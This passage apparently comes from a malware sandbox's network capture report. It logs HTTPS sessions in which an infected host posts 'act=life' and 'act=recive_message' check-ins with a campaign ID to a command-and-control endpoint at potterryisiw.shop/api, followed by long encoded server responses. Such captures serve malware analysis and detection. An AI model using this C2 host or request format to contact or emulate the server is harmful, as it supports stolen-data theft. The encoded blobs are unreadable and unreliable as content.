4c06nlMtX2Bqf4nFzvCFbFf22XvcwuAKeNevFiyzaQFwFhNqd3krQEv73EErpBGuZ4e4C2hBUMo4t15y+IItZ5ZwEg6jCdu0ji8odc+QhW5mk62/TOPg2qkmylF4on0Hh8Sm36ef3TL/69xBu7Ck6jMXCEsYoWCaqHeeotgCDXbWAGIfc6n71K6/qLHLZLGOt6Os30zhwb6ds/pw2EOcx1YRtt0DSbtkPxv8YD+SJ9img4w7GCW1vrw3bhLoU
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 67 51 71 35 6a 6d 66 75 55 50 70 2b 6f 51 62 76 30 55 61 36 6e 63 36 7a 66 54 4f 48 42 76 70 32 7a 2b 6e 44 6f 49 74 79 47 51 71 53 44 43 72 58 2f 37 54 58 61 57 2f 67 78 44 33 45 6c 53 68 63 6e 36 44 74 34 34 54 45 61 6d 52 65 65 51 6b 68 79 44 52 64 57 55 4c 49 65 38 2b 6b 72 39 4a 34 66 43 48 45 37 5a 4f 47 4f 41 78 4e 4d 48 32 69 51 4e 44 38 63 45 39 79 43 47 66 49 35 34 39 64 55 52 48 6a 6c 79 4d 2b 67 54 67 38 38 52 45 39 51 6f 63 37 58 56 35 6a 37 2b 43 46 67 4b 74 68 48 44 6a 49 6f 38 76 32 33 35 68 41 69 50 71 50 5a 6d 38 53 4f 37 35 69 42 2b 30 54 46 61 76 4d 7a 71 45 72 73 35 44 51 65 6d 69 63 4f 77 75 69 53 72 50 65 43 70 45 62 61 55 35 6b 37 67 45 76 37 32 53 44 4b 42 4e 56 50 34 2f 45 75 6a 64 6c 31 6c 44 72 6f 38 39 76 32 44 4a 49 38 78 36 Data Ascii: gQq5jmfuUPp+oQbv0Ua6nc6zfTOHBvp2z+nDoItyGQqSDCrX/7TXaW/gxD3ElShcn6Dt44TEamReeQkhyDRdWULIe8+kr9J4fCHE7ZOGOAxNMH2iQND8cE9yCGfI549dURHjlyM+gTg88RE9Qoc7XV5j7+CFgKthHDjIo8v235hAiPqPZm8SO75iB+0TFavMzqErs5DQemicOwuiSrPeCpEbaU5k7gEv72SDKBNVP4/Eujdl1lDro89v2DJI8x6
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 59 34 6b 72 78 50 36 2f 71 42 45 37 52 44 45 2b 68 2f 61 49 71 34 68 68 4d 4d 72 49 68 39 36 69 69 46 4b 64 30 2f 4a 45 68 76 34 69 2f 56 34 41 61 6e 7a 59 6b 51 6f 55 30 5a 6f 54 4e 6c 7a 64 37 6c 63 42 72 72 77 33 72 72 59 74 46 72 6e 6e 68 75 43 69 72 72 4d 70 69 38 53 65 7a 74 6c 68 79 79 53 78 37 6d 59 33 61 4a 76 59 34 56 41 4b 4b 44 66 4f 73 6a 68 79 7a 58 50 79 52 49 62 2b 49 76 31 65 41 47 70 39 43 48 44 4b 46 42 46 65 30 78 4f 4a 7a 34 35 6e 42 6f 73 4d 45 39 34 43 37 4a 63 5a 77 2f 5a 67 59 71 35 44 43 55 73 55 54 6b 37 59 4d 63 73 30 45 5a 37 58 39 32 69 4c 32 46 47 41 6d 67 67 48 48 68 49 34 63 70 30 48 38 71 52 47 32 6c 4d 49 33 34 48 4b 57 2f 70 42 65 68 58 78 58 78 64 33 32 50 39 73 77 45 54 63 48 6f 46 76 35 67 79 53 37 53 50 7a 4a 49 62 Data Ascii: Y4krxP6/qBE7RDE+h/aIq4hhMMrIh96iiFKd0/JEhv4i/V4AanzYkQoU0ZoTNlzd7lcBrrw3rrYtFrnnhuCirrMpi8SeztlhyySx7mY3aJvY4VAKKDfOsjhyzXPyRIb+Iv1eAGp9CHDKFBFe0xOJz45nBosME94C7JcZw/ZgYq5DCUsUTk7YMcs0EZ7X92iL2FGAmggHHhI4cp0H8qRG2lMI34HKW/pBehXxXxd32P9swETcHoFv5gyS7SPzJIb
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 36 42 4f 44 7a 78 45 54 31 43 68 37 73 65 58 43 48 73 59 4d 63 42 61 43 52 64 4f 49 73 69 53 33 56 63 47 77 4f 4c 4f 55 6c 6b 37 78 4d 35 50 4b 4a 45 72 52 4f 56 71 38 7a 4f 6f 53 75 7a 6b 4e 42 36 62 46 77 36 54 6d 47 4c 73 39 31 4b 6b 67 77 71 31 2f 2b 30 31 32 6c 76 34 4d 51 39 78 4a 55 6f 58 56 30 6b 62 32 50 45 41 69 6e 68 48 4c 69 4b 49 6b 6d 32 6e 78 6b 41 53 37 6d 50 35 69 31 53 75 33 32 6a 52 75 37 54 68 47 68 50 7a 6a 44 73 5a 5a 62 57 2b 76 44 56 73 59 50 70 53 37 45 50 79 67 56 59 59 31 63 2f 71 45 47 70 2f 69 49 58 4f 38 49 56 75 31 34 64 6f 6d 39 69 52 45 4e 6f 49 31 32 39 54 43 4b 4c 64 31 32 61 51 30 6d 36 7a 65 53 76 55 72 67 2f 6f 38 59 76 55 6b 51 6f 54 38 34 77 37 47 57 57 31 76 72 77 31 48 6b 49 6f 51 7a 6e 6a 31 31 52 45 65 4f 58 49 Data Ascii: 6BODzxET1Ch7seXCHsYMcBaCRdOIsiS3VcGwOLOUlk7xM5PKJErROVq8zOoSuzkNB6bFw6TmGLs91Kkgwq1/+012lv4MQ9xJUoXV0kb2PEAinhHLiKIkm2nxkAS7mP5i1Su32jRu7ThGhPzjDsZZbW+vDVsYPpS7EPygVYY1c/qEGp/iIXO8IVu14dom9iRENoI129TCKLd12aQ0m6zeSvUrg/o8YvUkQoT84w7GWW1vrw1HkIoQznj11REeOXI
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 38 6f 63 61 73 51 70 59 6f 7a 46 39 6d 2f 62 57 57 55 4f 4a 6d 48 44 72 4a 63 6c 72 77 54 45 43 59 55 54 38 64 64 57 2f 53 4b 65 6e 78 6c 79 38 52 68 4c 6d 63 58 65 41 76 6f 73 66 43 61 79 44 64 66 55 71 69 53 37 4d 62 57 6f 44 4b 75 6b 30 6c 62 78 43 37 76 6d 48 47 50 63 45 56 4b 46 32 59 73 50 75 7a 46 73 75 70 59 52 55 34 44 6e 4a 61 38 45 78 41 6d 46 45 2f 48 58 56 76 30 69 6e 70 38 5a 63 74 6b 45 63 37 6e 78 35 68 62 57 46 48 67 6d 6f 68 48 58 71 4d 49 6f 6d 30 58 74 71 42 53 6e 6a 4e 70 71 2b 51 2b 37 2b 6a 42 76 33 42 46 53 68 64 6d 4c 44 37 73 78 62 4c 61 36 41 65 61 64 67 6c 6d 65 32 46 41 45 54 62 61 55 77 6d 66 67 63 70 62 2b 45 46 72 31 41 47 4f 46 32 61 49 57 2f 6a 68 67 52 71 6f 56 31 34 53 36 46 4a 4e 5a 32 61 67 38 6b 36 44 79 59 76 6b 54 Data Ascii: 8ocasQpYozF9m/bWWUOJmHDrJclrwTECYUT8ddW/SKenxly8RhLmcXeAvosfCayDdfUqiS7MbWoDKuk0lbxC7vmHGPcEVKF2YsPuzFsupYRU4DnJa8ExAmFE/HXVv0inp8ZctkEc7nx5hbWFHgmohHXqMIom0XtqBSnjNpq+Q+7+jBv3BFShdmLD7sxbLa6Aeadglme2FAETbaUwmfgcpb+EFr1AGOF2aIW/jhgRqoV14S6FJNZ2ag8k6DyYvkT
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 75 77 66 52 62 59 68 4b 4f 76 64 35 51 52 4e 77 65 67 57 2f 6b 72 69 51 72 55 2f 66 45 70 33 70 32 58 62 30 43 2b 4d 6c 4d 51 4f 39 78 4a 55 6f 54 5a 35 6b 61 53 49 47 42 57 71 78 45 50 5a 42 5a 4d 6b 32 47 68 37 4e 42 48 69 4c 5a 69 2b 55 2f 61 7a 6b 52 2b 35 52 42 48 33 4d 54 54 72 33 65 56 77 51 36 62 44 4a 61 55 62 79 57 47 65 51 43 52 69 52 49 35 63 31 61 41 45 76 37 33 45 4b 62 52 45 47 4f 5a 6e 61 38 36 52 6c 42 59 46 76 70 49 39 71 55 72 69 51 72 55 2f 62 45 70 33 70 32 66 62 30 43 2b 4d 6c 4d 51 59 70 67 70 4f 6f 79 45 6f 32 4f 50 64 54 46 50 37 36 78 61 4d 50 63 64 42 74 52 52 7a 59 6b 53 4f 58 4e 57 75 42 4c 2b 39 31 6c 4c 66 49 58 32 4b 4d 57 6a 44 37 73 78 62 52 4b 71 52 62 2b 45 68 6e 79 71 5a 51 56 51 6b 4b 4f 4d 79 6b 71 67 47 79 66 53 51 Data Ascii: uwfRbYhKOvd5QRNwegW/kriQrU/fEp3p2Xb0C+MlMQO9xJUoTZ5kaSIGBWqxEPZBZMk2Gh7NBHiLZi+U/azkR+5RBH3MTTr3eVwQ6bDJaUbyWGeQCRiRI5c1aAEv73EKbREGOZna86RlBYFvpI9qUriQrU/bEp3p2fb0C+MlMQYpgpOoyEo2OPdTFP76xaMPcdBtRRzYkSOXNWuBL+91lLfIX2KMWjD7sxbRKqRb+EhnyqZQVQkKOMykqgGyfSQ
2024-07-01 07:16:34 UTC	1369	IN	Data Raw: 57 76 47 52 48 6f 33 63 34 66 45 75 6e 62 50 37 64 77 30 6e 79 4e 4b 44 70 59 52 34 35 63 69 76 59 73 6a 4a 53 64 64 4e 77 68 66 61 46 6e 4f 74 76 30 33 46 56 72 77 75 67 57 70 7a 44 4a 63 5a 77 2f 4c 51 6b 39 39 7a 47 57 72 6b 65 67 77 62 6f 64 75 6b 56 61 37 33 70 36 68 4b 61 59 41 45 2b 68 67 47 66 39 48 4c 63 43 30 6e 6c 74 45 43 6a 6a 45 62 58 34 43 6f 2b 55 37 33 66 33 52 56 61 35 4d 30 50 44 2f 73 34 6b 54 63 48 6f 46 6f 78 69 6b 57 6d 47 50 53 6f 2f 4c 4f 73 35 6b 71 35 56 71 74 65 6e 4a 6f 30 49 4f 75 5a 6b 4f 4c 65 78 6e 67 6f 49 70 49 38 39 71 55 72 69 51 72 55 2f 62 45 70 33 70 32 66 62 30 43 2b 4d 6c 4d 51 59 70 67 70 4f 6f 79 45 6f 32 4f 50 64 54 46 50 37 36 78 61 4d 50 63 64 42 74 52 52 7a 59 6b 53 4f 58 4e 57 75 42 4c 2b 39 31 6c 4c 66 49 Data Ascii: WvGRHo3c4fEunbP7dw0nyNKDpYR45civYsjJSddNwhfaFnOtv03FVrwugWpzDJcZw/LQk99zGWrkegwbodukVa73p6hKaYAE+hgGf9HLcC0nltECjjEbX4Co+U73f3RVa5M0PD/s4kTcHoFoxikWmGPSo/LOs5kq5VqtenJo0IOuZkOLexngoIpI89qUriQrU/bEp3p2fb0C+MlMQYpgpOoyEo2OPdTFP76xaMPcdBtRRzYkSOXNWuBL+91lLfI

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49799	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:34 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: potterryisiw.shop
2024-07-01 07:16:34 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-07-01 07:16:34 UTC	806	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f9cc9g0an9dlvqtkrprg2o5kv9; expires=Fri, 25-Oct-2024 01:03:13 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HkHk1R%2FEpw5tYvYCwb7a5XpSHyZ48iR6mEtT5wVz3FoMOSS%2BTssrZgV4rrHDiXeZXhUOhhNz%2F0OpUhvg3tfV4TzcskiqsaInZXLGaBOyK1xLi8Mqe8qwew%2FmX0rVb2PdDRHooA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c8398100c95-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:34 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-07-01 07:16:34 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.4	49804	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
2024-07-01 07:16:35 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 53 Host: potterryisiw.shop
2024-07-01 07:16:35 UTC	53	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 38 4e 67 43 6c 2d 2d 64 65 66 61 75 6c 74 32 38 30 36 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=H8NgCl--default2806&j=
2024-07-01 07:16:35 UTC	808	IN	HTTP/1.1 200 OK Date: Mon, 01 Jul 2024 07:16:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=fm516qv7rofsjit1n658dmcr71; expires=Fri, 25-Oct-2024 01:03:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BDwN9YU0ZdtMEviK%2FduhNBcRUXeW8CgShMlguQWGIDURRwTPTluh8K%2BRWP5K2JxVj79a366jukuWdV4CqvWRU%2FmXwSmXA8whaHeW%2BEtYegZdFKyqvXeU9gOfZAcuuWjqChlkOw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 89c49c896d190f41-EWR alt-svc: h3=":443"; ma=86400
2024-07-01 07:16:35 UTC	561	IN	Data Raw: 34 64 64 0d 0a 4e 38 5a 35 66 45 75 77 44 67 6c 6c 41 58 6f 68 63 51 30 61 7a 53 73 4e 35 56 4a 69 48 35 48 6d 54 62 66 56 39 43 4b 75 46 41 74 4d 7a 48 42 65 50 5a 49 30 4b 56 45 74 63 43 68 54 66 6e 2f 76 45 53 32 52 49 42 64 36 76 65 78 45 6c 62 53 51 41 4a 51 30 62 56 61 71 43 68 6c 6e 75 67 63 72 41 48 6c 59 47 31 46 57 45 4d 51 69 64 73 56 77 42 33 47 7a 33 47 32 56 73 4a 35 41 7a 33 68 70 56 71 30 57 44 43 66 54 5a 6d 55 43 61 52 39 43 46 57 78 32 6f 45 35 6f 67 44 4d 49 63 66 69 4c 4a 64 72 33 32 41 4b 4d 63 58 45 56 2f 46 6c 65 42 74 56 36 61 43 68 67 43 55 70 54 4c 57 66 68 49 51 54 73 4b 55 49 39 39 49 68 76 6a 66 58 57 51 38 74 32 5a 31 47 69 45 68 51 6a 32 47 70 71 41 57 73 4b 53 42 64 6c 63 71 39 50 5a 49 6f 34 45 6e 50 33 6a 43 50 55 75 70 Data Ascii: 4ddN8Z5fEuwDgllAXohcQ0azSsN5VJiH5HmTbfV9CKuFAtMzHBePZI0KVEtcChTfn/vES2RIBd6vexElbSQAJQ0bVaqChlnugcrAHlYG1FWEMQidsVwB3Gz3G2VsJ5Az3hpVq0WDCfTZmUCaR9CFWx2oE5ogDMIcfiLJdr32AKMcXEV/FleBtV6aChgCUpTLWfhIQTsKUI99IhvjfXWQ8t2Z1GiEhQj2GpqAWsKSBdlcq9PZIo4EnP3jCPUup
2024-07-01 07:16:35 UTC	691	IN	Data Raw: 35 6c 73 61 4b 4e 5a 74 62 77 6c 74 48 45 38 56 59 58 57 67 54 32 57 48 4e 77 70 31 2b 34 55 69 33 72 69 57 52 63 46 79 62 31 6d 6c 48 6c 35 6e 6b 43 78 73 48 79 4e 41 41 56 4e 42 66 36 78 62 4c 62 49 7a 44 6e 50 30 6b 6d 2b 58 71 4e 67 6f 70 78 31 77 46 2b 51 63 45 6d 6d 4b 4c 69 73 4a 5a 68 64 52 45 6e 31 39 6f 56 74 6a 67 6a 59 4e 66 76 32 45 4b 74 4b 36 6d 45 62 4c 64 57 46 52 70 52 55 53 49 39 46 6f 61 45 63 74 57 67 4d 55 64 7a 6a 33 43 79 2b 32 4d 77 52 36 34 59 63 68 6c 66 57 4a 44 71 51 64 41 6b 7a 6d 57 78 6b 6c 6b 6a 51 70 52 32 6b 65 54 68 70 6b 66 36 64 46 66 59 77 2f 41 33 54 30 67 69 58 57 76 35 78 47 77 6e 64 75 55 4b 4d 4a 45 43 4c 66 62 32 45 42 49 31 59 42 55 32 68 67 37 78 45 74 78 78 34 44 62 4f 57 32 4c 4d 53 6d 31 67 4c 54 4f 41 45 Data Ascii: 5lsaKNZtbwltHE8VYXWgT2WHNwp1+4Ui3riWRcFyb1mlHl5nkCxsHyNAAVNBf6xbLbIzDnP0km+XqNgopx1wF+QcEmmKLisJZhdREn19oVtjgjYNfv2EKtK6mEbLdWFRpRUSI9FoaEctWgMUdzj3Cy+2MwR64YchlfWJDqQdAkzmWxklkjQpR2keThpkf6dFfYw/A3T0giXWv5xGwnduUKMJECLfb2EBI1YBU2hg7xEtxx4DbOW2LMSm1gLTOAE
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 34 63 30 33 0d 0a 79 77 6c 52 53 4d 66 57 31 4d 33 4f 75 39 74 59 5a 41 6b 43 7a 2f 47 68 79 48 62 73 49 41 41 6a 6d 6b 6e 50 63 39 77 42 32 75 53 61 32 64 48 4f 31 6f 44 48 57 4a 7a 6f 30 35 6d 68 6a 4d 41 64 2f 32 4c 4a 64 32 2f 6c 6b 33 4e 66 57 46 54 71 52 41 52 4a 74 56 6b 61 41 74 6d 46 55 42 54 49 54 72 76 54 6e 66 48 61 45 49 39 31 6f 6f 73 78 4b 62 55 64 63 39 34 5a 31 4b 79 57 31 77 32 6e 41 51 41 62 48 70 61 41 78 52 6a 4f 50 63 4c 4c 34 30 33 42 33 6e 2b 6a 69 7a 52 73 35 74 50 78 58 39 67 52 36 34 58 45 44 76 66 5a 6d 34 4a 62 78 31 4d 45 32 35 35 6f 55 4e 6b 78 33 35 43 50 66 53 63 62 34 33 31 31 6d 2f 42 5a 6e 74 66 72 77 70 63 48 4e 46 69 5a 51 42 31 57 41 45 4d 49 52 44 45 49 6e 62 46 63 41 64 78 73 39 78 74 6c 62 79 51 54 4d 42 32 62 30 Data Ascii: 4c03ywlRSMfW1M3Ou9tYZAkCz/GhyHbsIAAjmknPc9wB2uSa2dHO1oDHWJzo05mhjMAd/2LJd2/lk3NfWFTqRARJtVkaAtmFUBTITrvTnfHaEI91oosxKbUdc94Z1KyW1w2nAQAbHpaAxRjOPcLL403B3n+jizRs5tPxX9gR64XEDvfZm4Jbx1ME255oUNkx35CPfScb4311m/BZntfrwpcHNFiZQB1WAEMIRDEInbFcAdxs9xtlbyQTMB2b0
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 4b 74 78 6d 61 67 42 74 48 55 4d 55 5a 33 65 6a 51 6d 6e 48 66 6b 49 39 39 4a 78 76 6a 66 58 57 62 4d 64 79 66 30 37 6b 57 51 46 6e 75 67 63 41 48 69 46 59 52 42 38 76 49 4f 30 4a 62 49 4d 77 41 58 33 37 6c 69 2f 48 73 35 56 47 77 6e 39 6d 58 36 73 61 45 43 50 62 61 32 77 4b 5a 52 64 41 48 47 35 38 6f 55 67 76 79 58 4a 41 65 75 76 45 64 35 66 33 75 55 50 61 66 43 6b 58 75 31 56 32 51 72 6c 31 4b 55 64 6b 46 41 4e 4c 4c 54 69 6c 52 57 75 45 50 41 6c 78 2f 6f 55 72 30 72 71 53 51 4d 70 77 62 46 53 76 45 78 49 6d 32 47 42 76 43 32 6f 65 54 78 42 73 66 75 38 48 4c 63 63 33 47 44 32 72 78 6d 2f 30 75 70 31 4d 7a 48 56 34 55 75 52 56 58 47 6e 63 61 6d 74 48 4f 31 70 56 41 33 68 2f 37 56 59 68 37 31 74 72 5a 4c 48 45 4b 4e 6e 33 7a 67 4b 4d 66 48 74 51 71 68 38 Data Ascii: KtxmagBtHUMUZ3ejQmnHfkI99JxvjfXWbMdyf07kWQFnugcAHiFYRB8vIO0JbIMwAX37li/Hs5VGwn9mX6saECPba2wKZRdAHG58oUgvyXJAeuvEd5f3uUPafCkXu1V2Qrl1KUdkFANLLTilRWuEPAlx/oUr0rqSQMpwbFSvExIm2GBvC2oeTxBsfu8HLcc3GD2rxm/0up1MzHV4UuRVXGncamtHO1pVA3h/7VYh71trZLHEKNn3zgKMfHtQqh8
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 32 38 4d 62 78 31 47 48 47 78 78 71 6b 42 68 6c 54 6b 4f 64 66 75 4c 4b 74 36 33 6d 30 72 41 64 6d 6f 56 36 6c 6c 65 4c 73 6f 73 4d 30 55 6a 4b 6b 34 66 65 58 2b 67 43 53 32 59 66 6d 67 57 6d 4a 31 74 6c 62 43 61 41 4a 51 30 4b 56 4b 67 47 78 73 6e 31 32 46 76 43 6d 67 4b 55 52 4e 71 65 61 64 4f 66 59 73 36 43 33 33 39 68 79 54 56 74 70 70 42 77 6e 4e 67 46 65 70 5a 58 69 37 4b 4c 44 4e 46 49 7a 64 41 41 33 6c 7a 72 45 55 76 78 53 39 4f 46 5a 6a 76 4e 70 66 33 6b 55 79 4d 4c 69 73 56 71 42 63 62 4b 4e 56 74 59 67 64 67 43 6b 51 54 61 33 4f 67 52 57 47 4c 4f 77 74 32 38 49 34 6d 31 72 75 51 51 63 4a 32 5a 31 58 6b 56 56 78 70 31 58 51 72 58 79 46 59 59 78 68 35 62 61 78 5a 61 59 41 38 51 44 2f 73 79 6b 65 2b 33 49 38 43 6a 48 46 6c 46 66 78 5a 58 69 66 41 Data Ascii: 28Mbx1GHGxxqkBhlTkOdfuLKt63m0rAdmoV6lleLsosM0UjKk4feX+gCS2YfmgWmJ1tlbCaAJQ0KVKgGxsn12FvCmgKURNqeadOfYs6C339hyTVtppBwnNgFepZXi7KLDNFIzdAA3lzrEUvxS9OFZjvNpf3kUyMLisVqBcbKNVtYgdgCkQTa3OgRWGLOwt28I4m1ruQQcJ2Z1XkVVxp1XQrXyFYYxh5baxZaYA8QD/syke+3I8CjHFlFfxZXifA
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 51 55 41 30 73 74 4f 4b 64 45 5a 34 30 30 42 33 44 30 67 69 62 48 76 70 4e 4f 7a 48 4a 69 57 71 49 66 48 53 6e 41 61 6d 38 50 59 42 56 4f 48 57 78 38 37 77 63 74 78 7a 63 59 50 61 76 47 62 2b 65 36 6d 46 76 44 63 58 68 66 35 46 6b 42 5a 37 6f 48 41 42 34 68 57 45 51 66 4c 79 44 74 43 57 75 4a 49 67 74 38 2b 49 38 68 30 72 69 54 53 73 78 35 62 56 61 71 45 42 38 71 32 6d 46 6d 43 57 6b 52 53 68 52 6a 66 4b 67 4a 49 63 56 77 42 32 57 7a 33 47 32 56 6e 4c 64 74 34 48 46 7a 46 65 59 45 55 45 47 35 42 33 4a 46 49 78 39 50 55 7a 63 36 37 30 56 6d 69 7a 6f 4c 65 76 6d 4b 4a 74 75 38 68 46 4c 50 63 6d 70 63 70 78 77 58 4a 39 4a 72 62 67 6c 6b 47 55 67 58 5a 58 75 70 43 53 48 46 63 41 64 6c 73 39 78 74 6c 5a 75 56 51 4d 46 73 4b 52 65 37 56 58 5a 43 75 58 55 70 52 Data Ascii: QUA0stOKdEZ400B3D0gibHvpNOzHJiWqIfHSnAam8PYBVOHWx87wctxzcYPavGb+e6mFvDcXhf5FkBZ7oHAB4hWEQfLyDtCWuJIgt8+I8h0riTSsx5bVaqEB8q2mFmCWkRShRjfKgJIcVwB2Wz3G2VnLdt4HFzFeYEUEG5B3JFIx9PUzc670VmizoLevmKJtu8hFLPcmpcpxwXJ9JrbglkGUgXZXupCSHFcAdls9xtlZuVQMFsKRe7VXZCuXUpR
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 56 61 54 6a 68 43 79 2b 41 4b 45 41 6c 73 63 51 50 7a 72 71 61 52 34 77 30 64 68 76 4d 63 48 55 77 6b 43 78 73 43 79 4e 41 41 56 4e 6b 64 4b 74 4f 62 34 6f 7a 43 48 6a 33 6a 69 72 56 76 34 52 49 7a 48 46 37 52 36 51 53 47 79 58 52 62 47 38 42 61 68 35 41 46 79 38 32 37 51 6c 6f 6e 33 42 59 50 37 4f 70 49 39 4b 65 6b 56 75 4d 4e 48 59 62 7a 48 42 31 4d 4a 41 73 62 41 73 6a 51 41 46 54 62 6e 4f 6c 52 6d 4b 45 4e 67 4e 32 39 6f 34 75 30 72 2b 62 55 73 39 35 5a 6c 47 6b 46 42 67 76 30 32 4e 74 41 47 6f 5a 53 78 51 76 4e 75 30 4a 61 4a 39 77 57 44 2b 7a 71 69 6a 57 73 39 59 43 30 7a 67 42 50 73 38 43 58 47 6e 56 59 43 74 66 49 56 68 44 47 57 56 79 6f 55 6c 6f 6c 54 59 4a 66 66 43 57 4c 4e 4f 2f 6b 45 7a 41 65 32 46 63 70 42 34 56 4a 4e 6c 68 62 51 64 6f 47 51 Data Ascii: VaTjhCy+AKEAlscQPzrqaR4w0dhvMcHUwkCxsCyNAAVNkdKtOb4ozCHj3jirVv4RIzHF7R6QSGyXRbG8Bah5AFy827Qlon3BYP7OpI9KekVuMNHYbzHB1MJAsbAsjQAFTbnOlRmKENgN29o4u0r+bUs95ZlGkFBgv02NtAGoZSxQvNu0JaJ9wWD+zqijWs9YC0zgBPs8CXGnVYCtfIVhDGWVyoUlolTYJffCWLNO/kEzAe2FcpB4VJNlhbQdoGQ
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 2f 42 34 2f 31 56 68 72 46 75 7a 4b 52 37 37 63 6a 79 69 6e 48 51 49 56 73 6c 74 47 61 34 41 69 41 32 77 49 63 77 4d 42 4c 79 44 74 43 53 69 45 49 68 4a 37 38 4a 49 73 6b 6f 6d 6f 5a 39 5a 37 62 30 4b 31 4a 53 41 75 79 47 46 74 45 48 4a 55 56 68 42 68 64 71 68 66 4c 38 6c 59 61 78 61 59 78 43 43 56 37 39 52 35 6a 44 34 70 61 75 70 7a 64 55 4b 35 4c 48 4e 48 4f 31 6f 44 4a 6d 78 32 6f 55 35 35 6c 6e 30 6e 5a 2f 36 43 4f 4d 54 33 32 43 69 6e 48 51 49 56 6f 6c 74 47 61 34 49 69 41 32 77 49 63 77 4d 58 66 6a 6a 33 43 7a 2f 56 61 31 55 75 70 4e 52 39 76 64 7a 39 58 34 49 65 41 6a 36 39 63 33 56 43 75 53 78 39 52 7a 74 61 45 56 30 48 45 38 51 69 4c 35 56 77 57 44 2b 7a 77 79 7a 48 70 5a 42 44 32 6e 55 75 61 35 6f 31 47 53 2f 58 61 33 74 46 54 52 4e 58 46 43 38 Data Ascii: /B4/1VhrFuzKR77cjyinHQIVsltGa4AiA2wIcwMBLyDtCSiEIhJ78JIskomoZ9Z7b0K1JSAuyGFtEHJUVhBhdqhfL8lYaxaYxCCV79R5jD4paupzdUK5LHNHO1oDJmx2oU55ln0nZ/6COMT32CinHQIVoltGa4IiA2wIcwMXfjj3Cz/Va1UupNR9vdz9X4IeAj69c3VCuSx9RztaEV0HE8QiL5VwWD+zwyzHpZBD2nUua5o1GS/Xa3tFTRNXFC8
2024-07-01 07:16:35 UTC	1369	IN	Data Raw: 2b 78 62 61 7a 33 33 6c 57 2b 4e 39 63 59 53 6c 79 4d 36 41 76 52 4a 64 6b 4b 35 63 79 56 76 43 48 4e 61 65 77 51 54 78 41 6c 35 78 32 68 43 4c 37 33 73 52 4c 37 63 31 6c 4b 4d 4c 69 73 56 34 78 67 4d 4f 39 52 76 66 51 51 6b 4a 6e 30 53 59 6e 66 6a 52 32 53 48 4e 78 42 72 36 4d 67 6e 31 71 32 4d 66 76 4a 64 5a 56 4f 6a 41 52 6b 76 39 45 77 72 53 51 74 7a 4b 48 67 76 64 2b 38 52 4c 62 35 77 53 44 33 4d 79 6b 65 2b 33 50 30 41 31 44 59 78 46 2b 51 75 48 53 66 63 61 33 30 57 4c 6a 42 67 4b 56 55 36 67 30 35 36 78 51 51 48 62 65 4b 50 49 74 6e 33 32 43 69 6e 48 51 49 56 6f 6c 74 47 61 34 49 69 41 32 77 49 63 77 4d 58 66 6a 6a 33 43 7a 2f 56 61 31 55 75 70 4e 52 39 76 64 7a 39 58 34 49 65 41 6a 36 39 63 33 56 43 75 53 78 39 52 7a 74 61 45 56 30 48 45 38 51 69 Data Ascii: +xbaz33lW+N9cYSlyM6AvRJdkK5cyVvCHNaewQTxAl5x2hCL73sRL7c1lKMLisV4xgMO9RvfQQkJn0SYnfjR2SHNxBr6Mgn1q2MfvJdZVOjARkv9EwrSQtzKHgvd+8RLb5wSD3Myke+3P0A1DYxF+QuHSfca30WLjBgKVU6g056xQQHbeKPItn32CinHQIVoltGa4IiA2wIcwMXfjj3Cz/Va1UupNR9vdz9X4IeAj69c3VCuSx9RztaEV0HE8Qi

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.4	49806	188.114.97.3	443

Timestamp	Bytes transferred	Direction	Data
